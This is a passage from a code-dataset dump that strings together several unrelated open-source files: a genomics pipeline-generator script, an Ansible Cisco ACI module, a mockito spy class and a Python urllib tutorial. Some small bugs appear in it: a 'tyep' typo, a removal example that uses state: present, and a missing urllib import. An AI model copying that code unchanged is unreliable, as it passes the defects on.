this\n string\n --control= read control values from a file (see list below)\n --base= path prefix; other filenames can use \"{base}\" to\n refer to this path\n --chromosomes= read chromosome names and lengths from a file\n (default is {base}/data/hg19.chrom_lengths)\n --blacklist= (cumulative) track file of blacklist intervals\n --input= (required) track file to process\n --track= (required) track file to create\n (default is {base}/tracks/{run}.insert_length.sparse)\n --tempinput= temporary file to hold input track file, if\n needed; only needed if the input track was gzipped\n (default is {base}/tracks/{run}.insert_length.sparse.scratch)\n --temp= temporary file to hold track file, if needed; only\n needed if --gzip and --bigwig are both used\n (default is {base}/tracks/{run}.insert_length.sparse.temp)\n --gzip compress track file\n --undated don't include today's date in the track name\n --bigwig[=] create bigwig file in addition to track file\n --bigwigchroms= chromosomes file for bedGraphToBigWig\n (default is {base}/temp/ucsc.hg19.chrom_lengths)\n --bigwigurl= url for the bigwig file; this can use {bigwig}\n for the bigwig filename\n --bigwiglink= path at which to create a symbolic link to the\n bigwig and info files; this can use {bigwig}\n for the bigwig filename\n --bigwigposition= intitial UCSC browser interval for bigwig track\n --initialize= (cumulative) shell command to add to job beginning\n \"shebang:bash\" is mapped \"#!/usr/bin/env bash\"\n other commands are copied \"as is\"\n\nvalues read from control file:\n avgInsertLen.{run}\n insert_length_sparse.maskLevel\n insert_length_sparse.windowLength\n insert_length_sparse.minLength\n insert_length_sparse.density\n insert_length_sparse.densityClip\n insert_length_sparse.samplingStep\"\"\"\n\n\tif (s == None): exit (message)\n\telse: exit (\"%s%s\" % (s,message))\n\n\ndef main():\n\tglobal basePath,runName\n\tglobal debug\n\n\tbashShebang = \"#!/usr/bin/env bash\"\n\n\t# parse args\n\n\trunName = None\n\tcontrolFilename = None\n\tbasePath = None\n\tblacklistFilenames = []\n\tinputFilename = None\n\tchromsFilename = None\n\ttrackName = None\n\ttempInputFilename = None\n\ttempFilename = None\n\tgzipOutput = False\n\tdateInTrackname = True\n\tbigWigFilename = None\n\tbigWigChromsFilename = None\n\tbigWigUrl = None\n\tbigWigLink = None\n\tbigWigPosition = None\n\tbashInitializers = [\"set -eu\"]\n\tdebug = []\n\n\tfor arg in argv[1:]:\n\t\tif (\"=\" in arg):\n\t\t\targVal = arg.split(\"=\",1)[1].strip()\n\n\t\tif (arg.startswith(\"--control=\")):\n\t\t\tcontrolFilename = argVal\n\t\telif (arg.startswith(\"--base=\")) or (arg.startswith(\"--basepath=\")) or (arg.startswith(\"--path=\")):\n\t\t\tbasePath = argVal\n\t\telif (arg.startswith(\"--blacklist=\")):\n\t\t\tblacklistFilenames += [argVal]\n\t\telif (arg.startswith(\"--input=\")):\n\t\t\tinputFilename = argVal\n\t\telif (arg.startswith(\"--chromosomes=\")) or (arg.startswith(\"--chroms=\")):\n\t\t\tchromsFilename = argVal\n\t\telif (arg.startswith(\"--track=\")):\n\t\t\ttrackName = argVal\n\t\telif (arg.startswith(\"--tempinput=\")):\n\t\t\ttempInputFilename = argVal\n\t\telif (arg.startswith(\"--temp=\")):\n\t\t\ttempFilename = argVal\n\t\telif (arg == \"--gzip\"):\n\t\t\tgzipOutput = True\n\t\telif (arg == \"--undated\"):\n\t\t\tdateInTrackname = False\n\t\telif (arg == \"--bigwig\"):\n\t\t\tbigWigFilename = \"{track}.bw\"\n\t\telif (arg.startswith(\"--bigwig=\")):\n\t\t\tbigWigFilename = argVal\n\t\telif (arg.startswith(\"--bigwigchromosomes=\")) or (arg.startswith(\"--bigwigchroms=\")):\n\t\t\tbigWigChromsFilename = argVal\n\t\telif (arg.startswith(\"--bigwigurl=\")) or (arg.startswith(\"--url=\")):\n\t\t\tbigWigUrl = argVal\n\t\telif (arg.startswith(\"--bigwiglink=\")) or (arg.startswith(\"--link=\")):\n\t\t\tbigWigLink = argVal\n\t\telif (arg.startswith(\"--bigwigposition=\")) or (arg.startswith(\"--bigwigpos=\")):\n\t\t\tbigWigPosition = argVal\n\t\telif (arg.startswith(\"--initialize=\")) or (arg.startswith(\"--init=\")):\n\t\t\tif (argVal == \"shebang:bash\"):\n\t\t\t\targVal = bashShebang\n\t\t\tif (argVal == \"set -eu\"):\n\t\t\t\tbashInitializers = [x for x in bashInitializers if (x != \"set -eu\")]\n\t\t\tbashInitializers += [argVal]\n\t\telif (arg == \"--debug\"):\n\t\t\tdebug += [\"debug\"]\n\t\telif (arg.startswith(\"--debug=\")):\n\t\t\tdebug += argVal.split(\",\")\n\t\telif (arg.startswith(\"--\")):\n\t\t\tusage(\"unrecognized option: %s\" % arg)\n\t\telif (runName == None):\n\t\t\tfields = arg.split(\":\",2)\n\t\t\tif (len(fields) != 3):\n\t\t\t\tfields = arg.split(\"_\")\n\t\t\tif (len(fields) < 3) or (fields[-1] not in [\"PE\",\"MP\"]):\n\t\t\t\tusage(\"\\\"%s\\\" is not a valid run descriptor\" % arg)\n\t\t\trunName = \"_\".join(fields)\n\t\telse:\n\t\t\tusage(\"unrecognized option: %s\" % arg)\n\n\tif (runName == None):\n\t\tusage(\"you have to give me a run descriptor\")\n\n\tif (controlFilename == None):\n\t\tusage(\"you have to give me a control filename\")\n\n\tif (inputFilename == None):\n\t\tusage(\"you have to give me an input track filename\")\n\n\tif (chromsFilename == None):\n\t\tchromsFilename = \"{base}/data/hg19.chrom_lengths\"\n\n\tif (trackName == None):\n\t\ttrackName = \"{base}/tracks/{run}.insert_length.sparse\"\n\n\tif (tempInputFilename == None) and (inputFilename.endswith(\".gz\")):\n\t\ttempInputFilename = trackName + \".scratch\"\n\n\tif (tempFilename == None) and (bigWigFilename != None) and (gzipOutput):\n\t\ttempFilename = trackName + \".temp\"\n\n\tif (bigWigFilename != None):\n\t\tif (bigWigChromsFilename == None):\n\t\t\tbigWigChromsFilename = \"{base}/temp/ucsc.hg19.chrom_lengths\"\n\t\tif (bigWigUrl == None):\n\t\t\tusage(\"you have to give me a url for the bigwig file\")\n\n\ttrackId = \"%s.insert_length.sparse\" % runName\n\n\t##########\n\t# perform filename substitution\n\t##########\n\n\tif (basePath == None): basePath = \".\"\n\telif (basePath.endswith(\"/\")): basePath = basePath[:-1]\n\n\tcontrolFilename = do_filename_substitutition(controlFilename)\n\tchromsFilename = do_filename_substitutition(chromsFilename)\n\n\t# blacklist track names\n\n\tfor (ix,blacklistFilename) in enumerate(blacklistFilenames):\n\t\tblacklistFilename = do_filename_substitutition(blacklistFilename)\n\t\tassert (not blacklistFilename.endswith(\".gz\"))\n\t\tassert (not blacklistFilename.endswith(\".gzip\"))\n\t\tif (not blacklistFilename.endswith(\".dat\")): blacklistFilename += \".dat\"\n\t\tblacklistFilenames[ix] = blacklistFilename\n\n\t# input track name\n\n\tinputFilename = do_filename_substitutition(inputFilename)\n\n\tgzipInput = False\n\tif (inputFilename.endswith(\".gz\")): gzipInput = True\n\telif (inputFilename.endswith(\".gzip\")): gzipInput = True\n\telif (not inputFilename.endswith(\".dat\")): inputFilename += \".dat\"\n\n\t# track name\n\n\ttrackName = do_filename_substitutition(trackName)\n\n\ttrackFilename = trackName\n\tif (gzipOutput):\n\t\tif (not trackFilename.endswith(\".gz\")): trackFilename += \".gz\"\n\telse:\n\t\tif (not trackFilename.endswith(\".dat\")): trackFilename += \".dat\"\n\n\tif (tempInputFilename != None):\n\t\ttempInputFilename = do_filename_substitutition(tempInputFilename)\n\n\tif (tempFilename != None):\n\t\ttempFilename = do_filename_substitutition(tempFilename)\n\n\t# big wig name\n\n\tif (bigWigFilename != None):\n\t\tbigWigFilename = do_filename_substitutition(bigWigFilename)\n\t\tif (\"{track}\" in bigWigFilename):\n\t\t\ttrackTemp = trackName\n\t\t\tif (trackTemp.endswith(\".gz\")): trackTemp = trackTemp[:-3]\n\t\t\telif (trackTemp.endswith(\".dat\")): trackTemp = trackTemp[:-4]\n\t\t\tbigWigFilename = bigWigFilename.replace(\"{track}\",trackTemp)\n\t\t\tif (bigWigFilename.endswith(\".bw\")): infoFilename = bigWigFilename[:-3] + \".info\"\n\t\t\telse: infoFilename = bigWigFilename + \".info\"\n\n\tif (bigWigChromsFilename != None):\n\t\tbigWigChromsFilename = do_filename_substitutition(bigWigChromsFilename)\n\n\tif (bigWigUrl != None):\n\t\tbigWigTemp = bigWigFilename\n\t\tslashIx = bigWigTemp.rfind(\"/\")\n\t\tif (slashIx >= 0): bigWigTemp = bigWigTemp[slashIx+1:]\n\t\tbigWigUrl = bigWigUrl.replace(\"{bigwig}\",bigWigTemp)\n\n\tif (bigWigLink != None):\n\t\tbigWigSave = bigWigLink\n\t\tbigWigTemp = bigWigFilename\n\t\tslashIx = bigWigTemp.rfind(\"/\")\n\t\tif (slashIx >= 0): bigWigTemp = bigWigTemp[slashIx+1:]\n\t\tbigWigLink = bigWigLink.replace(\"{bigwig}\",bigWigTemp)\n\n\t\tinfoTemp = infoFilename\n\t\tslashIx = infoTemp.rfind(\"/\")\n\t\tif (slashIx >= 0): infoTemp = infoTemp[slashIx+1:]\n\t\tinfoLink = bigWigSave.replace(\"{bigwig}\",infoTemp)\n\n\t##########\n\t# get values from the control file\n\t##########\n\n\tavgInsertLen = None\n\tmaskLevel = None\n\twindowLength = None\n\tminLength = None\n\tdensityThreshold = None\n\tdensityClip = None\n\tsamplingStep = None\n\n\tf = file(controlFilename,\"rt\")\n\n\tlineNumber = 0\n\tfor line in f:\n\t\tlineNumber += 1\n\t\tline = line.strip()\n\t\tif (line == \"\"): continue\n\t\tif (line.startswith(\"#\")): continue\n\n\t\tfields = line.split()\n\t\tassert (len(fields) >= 3), \\\n\t\t \"not enough fields at control file line %d (%d, expected at least 3)\" \\\n\t\t % (lineNumber,len(fields))\n\t\tassert (fields[1] == \"=\"), \\\n\t\t \"can't understand control file line %d:\\n%s\" \\\n\t\t % (lineNumber,line)\n\n\t\t(name,_,val) = fields[:3]\n\t\tif (name == \"avgInsertLen.\" + runName): avgInsertLen = int(val)\n\t\tif (name == \"insert_length_sparse.maskLevel\"): maskLevel = val\n\t\tif (name == \"insert_length_sparse.windowLength\"): windowLength = int(val)\n\t\tif (name == \"insert_length_sparse.minLength\"): minLength = int(val)\n\t\tif (name == \"insert_length_sparse.density\"): densityThreshold = val\n\t\tif (name == \"insert_length_sparse.densityClip\"): densityClip = val\n\t\tif (name == \"insert_length_sparse.samplingStep\"): samplingStep = int(val)\n\n\tf.close()\n\n\tif (windowLength == None): windowLength = minLength\n\n\tif (avgInsertLen == None): assert(False), \"control file lacks avgInsertLen\"\n\tif (windowLength == None): assert(False), \"control file lacks windowLength\"\n\tif (minLength == None): assert(False), \"control file lacks minLength\"\n\tif (densityThreshold == None): assert(False), \"control file lacks density\"\n\tif (densityClip == None): assert(False), \"control file lacks density clip\"\n\tif (samplingStep == None): assert(False), \"control filelacks samplingStep\"\n\n\tif (blacklistFilenames != []):\n\t\tif (maskLevel == None): assert(False), \"control file lacks maskLevel\"\n\t\tif (\".\" in maskLevel):\n\t\t\twhile (maskLevel.endswith(\"0\")):\n\t\t\t\tmaskLevel = maskLevel[:-1]\n\t\t\tif (maskLevel.endswith(\".\")):\n\t\t\t\tmaskLevel = maskLevel[:-1]\n\n\tif (\".\" in densityThreshold):\n\t\twhile (densityThreshold.endswith(\"0\")):\n\t\t\tdensityThreshold = densityThreshold[:-1]\n\t\tif (densityThreshold.endswith(\".\")):\n\t\t\tdensityThreshold = densityThreshold[:-1]\n\n\tif (\".\" in densityClip):\n\t\twhile (densityClip.endswith(\"0\")):\n\t\t\tdensityClip = densityClip[:-1]\n\t\tif (densityClip.endswith(\".\")):\n\t\t\tdensityClip = densityClip[:-1]\n\n\t##########\n\t# create the job's shell script\n\t##########\n\n\t# write bash intitializers\n\n\tif (bashInitializers != None):\n\t\tfor (ix,bashInitializer) in enumerate(bashInitializers):\n\t\t\tif (bashInitializer != bashShebang): continue\n\t\t\tprint bashInitializer\n\t\t\tbashInitializers[ix] = None\n\t\tfor (ix,bashInitializer) in enumerate(bashInitializers):\n\t\t\tif (bashInitializer != \"set -eu\"): continue\n\t\t\tprint bashInitializer\n\t\t\tbashInitializers[ix] = None\n\t\tfor bashInitializer in bashInitializers:\n\t\t\tif (bashInitializer == None): continue\n\t\t\tprint do_filename_substitutition(bashInitializer)\n\t\tprint\n\n\tif (dateInTrackname):\n\t\tprint \"today=`today {mmm}/{d}/{yyyy}`\"\n\n\t# write commands describing the files the script will create\n\n\tif (tempInputFilename != None):\n\t\tprint \"echo \\\"will use %s as a temporary input file\\\"\" % tempInputFilename\n\n\tif (tempFilename != None):\n\t\tprint \"echo \\\"will write temporary files to %s\\\"\" % tempFilename\n\n\tprint \"echo \\\"will write track file to %s\\\"\" % trackFilename\n\n\tif (bigWigFilename != None):\n\t\tprint \"echo \\\"will write bigwig file to %s\\\"\" % bigWigFilename\n\n\t# write command(s) to create track file\n\n\tprint\n\tprint \"echo \\\"=== creating track %s ===\\\"\" % trackId\n\n\tif (gzipInput):\n\t\tcommands = []\n\t\tcommand = [\"time gzip -dc %s\" % inputFilename]\n\t\tcommands += [command]\n\t\tcommand = [\"> %s\" % tempInputFilename]\n\t\tcommands += [command]\n\n\t\tprint\n\t\tprint commands_to_pipeline(commands)\n\n\t\ttrackSourceFilename = tempInputFilename\n\telse:\n\t\ttrackSourceFilename = inputFilename\n\n\tcommands = []\n\tcommand = [\"time genodsp\"]\n\tcommand += [\"--chromosomes=%s\" % chromsFilename]\n\tcommand += [\"--show:uncovered\"]\n\tcommand += [\"= input %s --missing=-inf\" % trackSourceFilename]\n\tcommand += [\"= addconst %s\" % avgInsertLen]\n\tcommand += [\"= slidingsum W=%d D=W\" % windowLength]\n\tif (blacklistFilenames != []):\n\t\tcommand += [\"= percentile %s W=%d --min=1/inf --quiet\" % (maskLevel,samplingStep)]\n\t\tcommand += [\"= input %s --missing=-inf\" % trackSourceFilename]\n\t\tcommand += [\"= addconst %s\" % avgInsertLen]\n\t\tcommand += [\"= slidingsum W=%d D=W\" % windowLength]\n\tcommand += [\"= percentile %s,%s W=%d --min=1/inf --quiet\" \\\n\t\t\t % (densityClip,densityThreshold,samplingStep)]\n\tif (gzipInput): command += [\"= input %s --missing=-inf --destroy\" % trackSourceFilename]\n\telse: command += [\"= input %s --missing=-inf\" % trackSourceFilename]\n\tcommand += [\"= addconst %s\" % avgInsertLen]\n\tcommand += [\"= clip --min=percentile%s\" % densityClip]\n\tfor blacklistFilename in blacklistFilenames:\n\t\tcommand += [\"= mask %s --mask=percentile%s\" % (blacklistFilename,maskLevel)]\n\tcommand += [\"= anticlump --average=percentile%s L=%d\" \\\n\t\t\t % (densityThreshold,minLength)]\n\tfor blacklistFilename in blacklistFilenames:\n\t\tcommand += [\"= mask %s --mask=0\" % blacklistFilename]\n\tcommands += [command]\n\n\tif (gzipOutput):\n\t\tif (tempFilename != None):\n\t\t\tcommand = [\"tee %s\" % tempFilename]\n\t\t\tcommands += [command]\n\t\tcommand = [\"gzip\"]\n\t\tcommands += [command]\n\n\tcommand = [\"> %s\" % trackFilename]\n\tcommands += [command]\n\n\tprint\n\tprint commands_to_pipeline(commands)\n\n\t# write command(s) to convert track file to bigwig\n\n\tif (bigWigFilename != None):\n\t\tprint\n\t\tprint \"echo \\\"=== converting track %s to bigwig ===\\\"\" % trackId\n\n\t\tif (tempFilename != None): trackInput = tempFilename\n\t\telse: trackInput = trackFilename\n\n\t\tcommands = []\n\t\tcommand = [\"time bedGraphToBigWig\"]\n\t\tcommand += [trackInput]\n\t\tcommand += [bigWigChromsFilename]\n\t\tcommand += [bigWigFilename]\n\t\tcommands += [command]\n\n\t\tprint\n\t\tprint commands_to_pipeline(commands)\n\n\t\tif (tempFilename != None):\n\t\t\tcommands = []\n\t\t\tcommand = [\"rm %s\" % tempFilename]\n\t\t\tcommands += [command]\n\t\t\tprint\n\t\t\tprint commands_to_pipeline(commands)\n\n\t\tdescription = \"sparse intervals in average insert lengths\"\n\t\tif (dateInTrackname): description += \" (${today})\"\n\n\t\tcommands = []\n\t\tcommand = [\"make_bigwig_info\"]\n\t\tcommand += [\"--url=%s\" % bigWigUrl]\n\t\tcommand += [\"--name=\\\"%s insert lengths sparse\\\"\" % runName]\n\t\tcommand += [\"--desc=\\\"%s %s\\\"\" % (runName,description)]\n\t\tcommand += [\"--autoscale=\\\"on\\\"\"]\n\t\tcommand += [\"--alwayszero=\\\"on\\\"\"]\n\t\tcommand += [\"--maxheight=\\\"10:10:10\\\"\"]\n\t\tcommand += [\"--color=250,30,100\"]\n\t\tif (bigWigPosition != None): command += [\"--pos=\\\"%s\\\"\" % bigWigPosition]\n\t\tcommand += [\"> %s\" % infoFilename]\n\t\tcommands += [command]\n\n\t\tprint\n\t\tprint commands_to_pipeline(commands)\n\n\t\tif (bigWigLink != None):\n\t\t\tprint\n\t\t\tprint \"rm -f %s\" % infoLink\n\t\t\tprint \"ln -s %s %s\" % (infoFilename,infoLink)\n\t\t\tprint \"rm -f %s\" % bigWigLink\n\t\t\tprint \"ln -s %s %s\" % (bigWigFilename,bigWigLink)\n\n\t\t\tinfoUrl = bigWigUrl\n\t\t\tslashIx = infoUrl.rfind(\"/\")\n\t\t\tif (slashIx >= 0): infoUrl = infoUrl[:slashIx]\n\t\t\tinfoTemp = infoFilename\n\t\t\tslashIx = infoTemp.rfind(\"/\")\n\t\t\tif (slashIx >= 0): infoTemp = infoTemp[slashIx+1:]\n\t\t\tinfoUrl = infoUrl + \"/\" + infoTemp\n\t\t\tprint >>stderr, infoUrl\n\t\t\tprint\n\t\t\tprint \"echo \\\"track URL is %s\\\"\" % (infoUrl)\n\n\ndef commands_to_pipeline(commands):\n\tpipeline = []\n\tfor (cmdNum,cmd) in enumerate(commands):\n\t\tif (cmdNum == 0): prefix = \"\"\n\t\telse: prefix = \" | \"\n\n\t\tif (cmd[0].startswith(\">\")):\n\t\t\tassert (cmdNum != 0)\n\t\t\tassert (len(cmd) == 1)\n\t\t\tprefix = \" \"\n\n\t\tpipeline += [prefix + cmd[0]] \n\t\tfor line in cmd[1:]:\n\t\t\tpipeline += [\" \" + line]\n\n\treturn \" \\\\\\n\".join(pipeline)\n\n\ndef do_filename_substitutition(s):\n\tif (\"{base}\" in s):\n\t\tassert (basePath != None)\n\t\ts = s.replace(\"{base}\",basePath)\n\tif (\"{run}\" in s):\n\t\tassert (runName != None)\n\t\ts = s.replace(\"{run}\",runName)\n\treturn s\n\n\nif __name__ == \"__main__\": main()\n\n"},"license":{"kind":"string","value":"gpl-3.0"}}},{"rowIdx":2458,"cells":{"repo_name":{"kind":"string","value":"gaddman/ansible"},"path":{"kind":"string","value":"lib/ansible/modules/network/aci/aci_contract_subject_to_filter.py"},"copies":{"kind":"string","value":"2"},"size":{"kind":"string","value":"9063"},"content":{"kind":"string","value":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\n# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)\n\nfrom __future__ import absolute_import, division, print_function\n__metaclass__ = type\n\nANSIBLE_METADATA = {'metadata_version': '1.1',\n 'status': ['preview'],\n 'supported_by': 'certified'}\n\nDOCUMENTATION = r'''\n---\nmodule: aci_contract_subject_to_filter\nshort_description: Bind Contract Subjects to Filters (vz:RsSubjFiltAtt)\ndescription:\n- Bind Contract Subjects to Filters on Cisco ACI fabrics.\nnotes:\n- The C(tenant), C(contract), C(subject), and C(filter_name) must exist before using this module in your playbook.\n The M(aci_tenant), M(aci_contract), M(aci_contract_subject), and M(aci_filter) modules can be used for these.\nseealso:\n- module: aci_tenant\n- module: aci_contract\n- module: aci_contract_subject\n- module: aci_filter\n- name: APIC Management Information Model reference\n description: More information about the internal APIC class B(vz:RsSubjFiltAtt).\n link: https://developer.cisco.com/docs/apic-mim-ref/\nauthor:\n- Jacob McGill (@jmcgill298)\nversion_added: '2.4'\noptions:\n contract:\n description:\n - The name of the contract.\n aliases: [ contract_name ]\n filter:\n description:\n - The name of the Filter to bind to the Subject.\n aliases: [ filter_name ]\n log:\n description:\n - Determines if the binding should be set to log.\n - The APIC defaults to C(none) when unset during creation.\n choices: [ log, none ]\n aliases: [ directive ]\n subject:\n description:\n - The name of the Contract Subject.\n aliases: [ contract_subject, subject_name ]\n state:\n description:\n - Use C(present) or C(absent) for adding or removing.\n - Use C(query) for listing an object or multiple objects.\n choices: [ absent, present, query ]\n default: present\n tenant:\n description:\n - The name of the tenant.\n required: yes\n aliases: [ tenant_name ]\nextends_documentation_fragment: aci\n'''\n\nEXAMPLES = r'''\n- name: Add a new contract subject to filer binding\n aci_contract_subject_to_filter:\n host: apic\n username: admin\n password: SomeSecretPassword\n tenant: production\n contract: web_to_db\n subject: test\n filter: '{{ filter }}'\n log: '{{ log }}'\n state: present\n delegate_to: localhost\n\n- name: Remove an existing contract subject to filter binding\n aci_contract_subject_to_filter:\n host: apic\n username: admin\n password: SomeSecretPassword\n tenant: production\n contract: web_to_db\n subject: test\n filter: '{{ filter }}'\n log: '{{ log }}'\n state: present\n delegate_to: localhost\n\n- name: Query a specific contract subject to filter binding\n aci_contract_subject_to_filter:\n host: apic\n username: admin\n password: SomeSecretPassword\n tenant: production\n contract: web_to_db\n subject: test\n filter: '{{ filter }}'\n state: query\n delegate_to: localhost\n register: query_result\n\n- name: Query all contract subject to filter bindings\n aci_contract_subject_to_filter:\n host: apic\n username: admin\n password: SomeSecretPassword\n tenant: production\n contract: web_to_db\n subject: test\n state: query\n delegate_to: localhost\n register: query_result\n'''\n\nRETURN = r'''\ncurrent:\n description: The existing configuration from the APIC after the module has finished\n returned: success\n type: list\n sample:\n [\n {\n \"fvTenant\": {\n \"attributes\": {\n \"descr\": \"Production environment\",\n \"dn\": \"uni/tn-production\",\n \"name\": \"production\",\n \"nameAlias\": \"\",\n \"ownerKey\": \"\",\n \"ownerTag\": \"\"\n }\n }\n }\n ]\nerror:\n description: The error information as returned from the APIC\n returned: failure\n type: dict\n sample:\n {\n \"code\": \"122\",\n \"text\": \"unknown managed object class foo\"\n }\nraw:\n description: The raw output returned by the APIC REST API (xml or json)\n returned: parse error\n type: string\n sample: ''\nsent:\n description: The actual/minimal configuration pushed to the APIC\n returned: info\n type: list\n sample:\n {\n \"fvTenant\": {\n \"attributes\": {\n \"descr\": \"Production environment\"\n }\n }\n }\nprevious:\n description: The original configuration from the APIC before the module has started\n returned: info\n type: list\n sample:\n [\n {\n \"fvTenant\": {\n \"attributes\": {\n \"descr\": \"Production\",\n \"dn\": \"uni/tn-production\",\n \"name\": \"production\",\n \"nameAlias\": \"\",\n \"ownerKey\": \"\",\n \"ownerTag\": \"\"\n }\n }\n }\n ]\nproposed:\n description: The assembled configuration from the user-provided parameters\n returned: info\n type: dict\n sample:\n {\n \"fvTenant\": {\n \"attributes\": {\n \"descr\": \"Production environment\",\n \"name\": \"production\"\n }\n }\n }\nfilter_string:\n description: The filter string used for the request\n returned: failure or debug\n type: string\n sample: ?rsp-prop-include=config-only\nmethod:\n description: The HTTP method used for the request to the APIC\n returned: failure or debug\n type: string\n sample: POST\nresponse:\n description: The HTTP response from the APIC\n returned: failure or debug\n type: string\n sample: OK (30 bytes)\nstatus:\n description: The HTTP status from the APIC\n returned: failure or debug\n type: int\n sample: 200\nurl:\n description: The HTTP url used for the request to the APIC\n returned: failure or debug\n type: string\n sample: https://10.11.12.13/api/mo/uni/tn-production.json\n'''\n\nfrom ansible.module_utils.network.aci.aci import ACIModule, aci_argument_spec\nfrom ansible.module_utils.basic import AnsibleModule\n\n\ndef main():\n argument_spec = aci_argument_spec()\n argument_spec.update(\n contract=dict(type='str', aliases=['contract_name']), # Not required for querying all objects\n filter=dict(type='str', aliases=['filter_name']), # Not required for querying all objects\n log=dict(tyep='str', choices=['log', 'none'], aliases=['directive']),\n subject=dict(type='str', aliases=['contract_subject', 'subject_name']), # Not required for querying all objects\n tenant=dict(type='str', aliases=['tenant_name']), # Not required for querying all objects\n state=dict(type='str', default='present', choices=['absent', 'present', 'query']),\n )\n\n module = AnsibleModule(\n argument_spec=argument_spec,\n supports_check_mode=True,\n required_if=[\n ['state', 'absent', ['contract', 'filter', 'subject', 'tenant']],\n ['state', 'present', ['contract', 'filter', 'subject', 'tenant']],\n ],\n )\n\n contract = module.params['contract']\n filter_name = module.params['filter']\n log = module.params['log']\n subject = module.params['subject']\n tenant = module.params['tenant']\n state = module.params['state']\n\n # Add subject_filter key to modul.params for building the URL\n module.params['subject_filter'] = filter_name\n\n # Convert log to empty string if none, as that is what API expects. An empty string is not a good option to present the user.\n if log == 'none':\n log = ''\n\n aci = ACIModule(module)\n aci.construct_url(\n root_class=dict(\n aci_class='fvTenant',\n aci_rn='tn-{0}'.format(tenant),\n module_object=tenant,\n target_filter={'name': tenant},\n ),\n subclass_1=dict(\n aci_class='vzBrCP',\n aci_rn='brc-{0}'.format(contract),\n module_object=contract,\n target_filter={'name': contract},\n ),\n subclass_2=dict(\n aci_class='vzSubj',\n aci_rn='subj-{0}'.format(subject),\n module_object=subject,\n target_filter={'name': subject},\n ),\n subclass_3=dict(\n aci_class='vzRsSubjFiltAtt',\n aci_rn='rssubjFiltAtt-{0}'.format(filter_name),\n module_object=filter_name,\n target_filter={'tnVzFilterName': filter_name},\n ),\n )\n\n aci.get_existing()\n\n if state == 'present':\n aci.payload(\n aci_class='vzRsSubjFiltAtt',\n class_config=dict(\n tnVzFilterName=filter_name,\n directives=log,\n ),\n )\n\n aci.get_diff(aci_class='vzRsSubjFiltAtt')\n\n aci.post_config()\n\n elif state == 'absent':\n aci.delete_config()\n\n # Remove subject_filter used to build URL from module.params\n module.params.pop('subject_filter')\n\n aci.exit_json()\n\n\nif __name__ == \"__main__\":\n main()\n"},"license":{"kind":"string","value":"gpl-3.0"}}},{"rowIdx":2459,"cells":{"repo_name":{"kind":"string","value":"alistair-broomhead/robotframework-selenium2library"},"path":{"kind":"string","value":"test/lib/mockito/spying.py"},"copies":{"kind":"string","value":"70"},"size":{"kind":"string","value":"1062"},"content":{"kind":"string","value":"#!/usr/bin/env python\n# coding: utf-8\n\n'''Spying on real objects.'''\n\nfrom invocation import RememberedProxyInvocation, VerifiableInvocation\nfrom mocking import TestDouble\n\n__author__ = \"Serhiy Oplakanets \"\n__copyright__ = \"Copyright 2009-2010, Mockito Contributors\"\n__license__ = \"MIT\"\n__maintainer__ = \"Mockito Maintainers\"\n__email__ = \"mockito-python@googlegroups.com\"\n\n__all__ = ['spy']\n\ndef spy(original_object):\n return Spy(original_object)\n\nclass Spy(TestDouble):\n strict = True # spies always have to check if method exists\n \n def __init__(self, original_object):\n self.original_object = original_object\n self.invocations = []\n self.verification = None\n \n def __getattr__(self, name): \n if self.verification:\n return VerifiableInvocation(self, name)\n else:\n return RememberedProxyInvocation(self, name)\n \n def remember(self, invocation):\n self.invocations.insert(0, invocation)\n \n def pull_verification(self):\n v = self.verification\n self.verification = None\n return v\n "},"license":{"kind":"string","value":"apache-2.0"}}},{"rowIdx":2460,"cells":{"repo_name":{"kind":"string","value":"michaelliao/learn-python3"},"path":{"kind":"string","value":"samples/commonlib/use_urllib.py"},"copies":{"kind":"string","value":"20"},"size":{"kind":"string","value":"2195"},"content":{"kind":"string","value":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nfrom urllib import request, parse\n\n# get:\n\nwith request.urlopen('https://api.douban.com/v2/book/2129650') as f:\n data = f.read()\n print('Status:', f.status, f.reason)\n for k, v in f.getheaders():\n print('%s: %s' % (k, v))\n print('Data:', data.decode('utf-8'))\n\n# advanced get:\n\nreq = request.Request('http://www.douban.com/')\nreq.add_header('User-Agent', 'Mozilla/6.0 (iPhone; CPU iPhone OS 8_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/8.0 Mobile/10A5376e Safari/8536.25')\nwith request.urlopen(req) as f:\n print('Status:', f.status, f.reason)\n for k, v in f.getheaders():\n print('%s: %s' % (k, v))\n print('Data:', f.read().decode('utf-8'))\n\n# post:\n\nprint('Login to weibo.cn...')\nemail = input('Email: ')\npasswd = input('Password: ')\nlogin_data = parse.urlencode([\n ('username', email),\n ('password', passwd),\n ('entry', 'mweibo'),\n ('client_id', ''),\n ('savestate', '1'),\n ('ec', ''),\n ('pagerefer', 'https://passport.weibo.cn/signin/welcome?entry=mweibo&r=http%3A%2F%2Fm.weibo.cn%2F%3Fjumpfrom%3Dweibocom&jumpfrom=weibocom')\n])\n\nreq = request.Request('https://passport.weibo.cn/sso/login')\nreq.add_header('Origin', 'https://passport.weibo.cn')\nreq.add_header('User-Agent', 'Mozilla/6.0 (iPhone; CPU iPhone OS 8_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/8.0 Mobile/10A5376e Safari/8536.25')\nreq.add_header('Referer', 'https://passport.weibo.cn/signin/login?entry=mweibo&res=wel&wm=3349&r=http%3A%2F%2Fm.weibo.cn%2F%3Fjumpfrom%3Dweibocom')\n\nwith request.urlopen(req, data=login_data.encode('utf-8')) as f:\n print('Status:', f.status, f.reason)\n for k, v in f.getheaders():\n print('%s: %s' % (k, v))\n print('Data:', f.read().decode('utf-8'))\n\n# with proxy and proxy auth:\n\nproxy_handler = urllib.request.ProxyHandler({'http': 'http://www.example.com:3128/'})\nproxy_auth_handler = urllib.request.ProxyBasicAuthHandler()\nproxy_auth_handler.add_password('realm', 'host', 'username', 'password')\nopener = urllib.request.build_opener(proxy_handler, proxy_auth_handler)\nwith opener.open('http://www.example.com/login.html') as f:\n pass\n"},"license":{"kind":"string","value":"gpl-2.0"}}},{"rowIdx":2461,"cells":{"repo_name":{"kind":"string","value":"dongritengfei/phantomjs"},"path":{"kind":"string","value":"src/qt/qtwebkit/Tools/QueueStatusServer/model/activeworkitems.py"},"copies":{"kind":"string","value":"140"},"size":{"kind":"string","value":"3975"},"content":{"kind":"string","value":"# Copyright (C) 2010 Google Inc. All rights reserved.\n#\n# Redistribution and use in source and binary forms, 